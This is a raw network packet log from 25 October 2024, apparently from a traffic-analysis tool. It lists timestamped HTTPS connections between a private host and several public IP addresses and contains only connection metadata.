                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.172493935 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.172519922 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.172594070 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.172626972 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.172646046 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.172700882 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.172723055 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.172779083 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.172888041 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.172950029 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.172960997 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.173028946 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.215951920 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.215979099 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.216038942 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.267981052 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.287975073 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.288018942 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.288084030 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.288129091 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.288196087 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.288207054 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.288240910 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.288258076 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.288266897 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.288297892 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.288899899 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.288985968 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.288995981 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.289046049 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.402798891 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.402895927 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.402971983 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.403003931 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.403050900 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.403085947 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.403635025 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.403729916 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.403729916 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.403760910 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.403790951 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.403821945 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.446472883 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.446577072 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.518351078 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.518460989 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.518476963 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.518511057 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.518531084 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.518666029 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.518685102 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.518697023 CEST44349725104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.518747091 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.518795013 CEST49725443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.520912886 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.520950079 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.521027088 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.521408081 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.521428108 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.534823895 CEST44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.536088943 CEST49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.536113977 CEST44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.536595106 CEST44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.537672043 CEST49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.537753105 CEST44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.538259029 CEST49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.539027929 CEST49711443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.579334021 CEST44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.579334974 CEST44349711188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.583997011 CEST49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.673295975 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.673357964 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.673523903 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.673751116 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.673763037 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.689388990 CEST44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.689488888 CEST44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.689564943 CEST49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.690217972 CEST49727443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.690241098 CEST44349727104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.700419903 CEST44349711188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.700577974 CEST44349711188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.700661898 CEST49711443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.702402115 CEST49711443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.702445030 CEST44349711188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.710254908 CEST49730443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.710303068 CEST4434973035.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.710391045 CEST49730443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.710608959 CEST49730443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:49.710633039 CEST4434973035.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.140902996 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.141201973 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.141228914 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.141838074 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.142127037 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.142219067 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.142244101 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.183334112 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.188146114 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.277090073 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.277431965 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.277479887 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.278567076 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.279129982 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.279299021 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.279320002 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.279366016 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.279496908 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.281760931 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.281900883 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.281976938 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.281975031 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.282011032 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.282058954 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.282068968 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.282236099 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.282284975 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.282294989 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.282396078 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.282454014 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.282463074 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.323010921 CEST4434973035.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.323477983 CEST49730443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.323540926 CEST4434973035.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.325042963 CEST4434973035.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.325126886 CEST49730443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.326358080 CEST49730443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.326445103 CEST4434973035.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.326502085 CEST49730443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.332006931 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.332025051 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.332026958 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.367332935 CEST4434973035.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.378984928 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.379009962 CEST49730443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.379067898 CEST4434973035.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.400083065 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.400307894 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.400366068 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.400379896 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.400466919 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.400520086 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.400528908 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.401072025 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.401129007 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.401139021 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.401492119 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.401559114 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.401567936 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.427002907 CEST49730443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.442960024 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.442974091 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.468125105 CEST4434973035.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.468496084 CEST49730443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.468589067 CEST4434973035.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.468661070 CEST49730443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.468940973 CEST49731443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.468997002 CEST4434973135.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.469098091 CEST49731443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.469291925 CEST49731443192.168.2.1635.190.80.1
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.469310999 CEST4434973135.190.80.1192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.490955114 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.512497902 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.512650013 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.512726068 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.512758017 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.512784004 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.512837887 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.512845039 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.512928009 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.512988091 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.512993097 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.513075113 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.513134003 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.513139009 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.518996954 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519192934 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519248962 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519267082 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519372940 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519421101 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519429922 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519550085 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519604921 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519613028 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519692898 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519742966 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519751072 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519867897 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519937992 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.519944906 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.554997921 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.555021048 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.570990086 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.571010113 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.603085995 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.618993044 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.627664089 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.627856970 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.627974987 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.627989054 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.628206968 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.628272057 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.628278017 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.628556013 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.628614902 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.628619909 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.628704071 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.628758907 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.628765106 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638006926 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638199091 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638269901 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638290882 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638375998 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638433933 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638442993 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638540030 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638592005 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638600111 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638698101 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638751030 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.638757944 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.681984901 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.681996107 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.682030916 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.682054996 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.728117943 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.729854107 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.743772984 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.743871927 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.743927956 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.743974924 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.744009018 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.744020939 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.744031906 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.744062901 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.744115114 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.744121075 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.744215965 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.744271994 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.744277954 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.744539022 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.744592905 CEST49729443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.744597912 CEST44349729104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.756692886 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.756716967 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.756779909 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.756844044 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.756865025 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.756900072 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.756947041 CEST49728443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.756958961 CEST44349728104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:05:50.757263899 CEST44349728104.18.95.41192.168.2.16
